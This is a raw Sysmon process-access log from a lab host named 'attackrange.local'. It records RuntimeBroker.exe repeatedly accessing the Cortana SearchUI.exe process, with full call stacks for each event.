13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 